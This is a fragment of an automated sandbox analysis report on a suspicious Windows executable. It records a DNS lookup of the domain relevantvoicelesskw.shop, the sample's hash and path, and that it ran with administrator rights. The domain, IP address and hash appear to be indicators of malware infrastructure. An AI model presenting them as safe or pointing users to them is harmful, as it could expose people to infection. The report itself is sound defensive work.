                                                Mar 22, 2024 13:54:03.104690075 CET1.1.1.1192.168.2.40x95acNo error (0)relevantvoicelesskw.shop104.21.33.178A (IP address)IN (0x0001)false
                                                • relevantvoicelesskw.shop
                                                No statistics
                                                Target ID:0
                                                Start time:09:54:00
                                                Start date:22/03/2024
                                                Path:C:\Users\user\Desktop\Ag3ijL3z1w.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Ag3ijL3z1w.exe"
                                                Imagebase:0x60000
                                                File size:2'444'904 bytes
                                                MD5 hash:038F01C7AB34D20394B657CE5D5F3152
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                No disassembly